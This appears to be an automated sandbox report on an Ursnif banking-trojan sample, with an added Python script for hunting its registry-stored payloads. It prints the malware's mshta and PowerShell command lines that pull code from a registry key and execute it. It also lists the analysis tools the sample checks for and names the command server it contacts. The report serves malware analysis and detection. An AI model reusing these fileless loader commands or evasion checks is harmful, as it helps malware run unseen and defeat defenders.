Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\sample.vbs Jump to behavior
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate Jump to behavior
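The mshta and PowerShell command lines earlier in the report both read their code back from the HKCU\Software\AppDataLow\Software\Microsoft\<GUID> key that this entry shows WmiPrvSE.exe writing: DeviceFile is eval'd as JScript, UtilTool is ASCII-decoded and passed to iex. The following is an added example, not code from the report: Python that scores registry values by key path, size and whether the bytes decode to script text, which is the hunt to run on hosts that show the mshta/powershell pair in their process logs. The records are constructed (the UtilTool body is filler carrying PowerShell tokens, not the sample's payload), and the 4096-byte threshold and the token list are assumptions for the example; on a live host the records would come from winreg or Get-ItemProperty.

```python
"""Added example (not part of the sandbox report): flag registry values that look
like a script payload parked under an Ursnif-style HKCU\\...\\AppDataLow\\...\\<GUID> key."""
import re

# Key shape seen in the report: HKCU\Software\AppDataLow\Software\Microsoft\<GUID>
APPDATALOW_GUID_KEY = re.compile(r"\\Software\\AppDataLow\\Software\\Microsoft\\\{?[0-9A-Fa-f-]{36}\}?$")
SCRIPT_TOKENS = re.compile(
    r"\b(?:iex|invoke-expression|add-type|new-object|frombase64string|activexobject|eval)\b|\[system\.",
    re.IGNORECASE)
LARGE_VALUE = 4096            # assumed threshold for "large" binary data; tune per environment


def printable_ratio(blob: bytes) -> float:
    """Share of bytes that are printable ASCII or CR/LF/TAB (1.0 for plain script text)."""
    if not blob:
        return 0.0
    ok = sum(1 for b in blob if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return ok / len(blob)


def decode_as_script(blob: bytes) -> str:
    """The same decoding the dropper applies: [System.Text.Encoding]::ASCII.GetString(bytes)."""
    return blob.decode("ascii", errors="replace")


def assess_value(key_path: str, name: str, kind: str, data: bytes) -> list:
    """Reasons a value is suspicious, in fixed order; empty list for an unremarkable value."""
    reasons = []
    if APPDATALOW_GUID_KEY.search(key_path):
        reasons.append("ursnif_style_key_path")
    if kind == "REG_BINARY" and len(data) >= LARGE_VALUE:
        reasons.append("large_binary_value")
    if printable_ratio(data) > 0.95 and SCRIPT_TOKENS.search(decode_as_script(data)):
        reasons.append("script_text_in_value")
    return reasons


def hunt(values) -> dict:
    """values: iterable of (key_path, name, kind, data). Returns {(key_path, name): reasons}."""
    flagged = {}
    for key_path, name, kind, data in values:
        reasons = assess_value(key_path, name, kind, data)
        if reasons:
            flagged[(key_path, name)] = reasons
    return flagged


URSNIF_KEY = r"HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550"
# Constructed sample records; the UtilTool body is filler, not the sample's payload.
SAMPLE_VALUES = [
    (URSNIF_KEY, "UtilTool", "REG_BINARY",
     b"$s = New-Object System.Text.StringBuilder; # " + b"A" * 4200 + b"\r\n"),
    (URSNIF_KEY, "UtilDate", "REG_BINARY", bytes(range(32))),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer", "Thumbnails", "REG_BINARY",
     bytes([0x00, 0x01, 0xFE, 0xFF]) * 2000),
    (r"HKCU\Environment", "Path", "REG_SZ", b"C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps"),
]

if __name__ == "__main__":
    for (key, name), reasons in hunt(SAMPLE_VALUES).items():
        print(name, reasons)
```

The key-path check alone is the strongest single signal here, since AppDataLow\Software\Microsoft\<GUID> is not a location legitimate software writes to; the size and script-text checks are what catch the same loader if the GUID-keyed path changes.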
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (2 occurrences) Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX (2 occurrences) Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (5 occurrences) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (73 occurrences) Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (26 occurrences) Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: DEBUG: FS_CM - TRUESBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXEP
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE(
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXEP
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE(
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.716103963.000001C48F7B1000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1992 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964 Thread sleep time: -4611686018427385s >= -30000s
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dll
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6643
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2678
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05741577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 18_2_05741577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057314A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 18_2_057314A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05746E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 18_2_05746E4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05751802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 18_2_05751802
Source: rundll32.exe, 00000012.00000003.797288272.0000000000B78000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05745529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 18_2_05745529
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05752A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 18_2_05752A09

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.0.cs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F26CD6 cpuid 18_2_00F26CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 18_2_0574E3F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F266CE GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 18_2_00F266CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F25A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 18_2_00F25A5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 18_2_00F26CD6

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY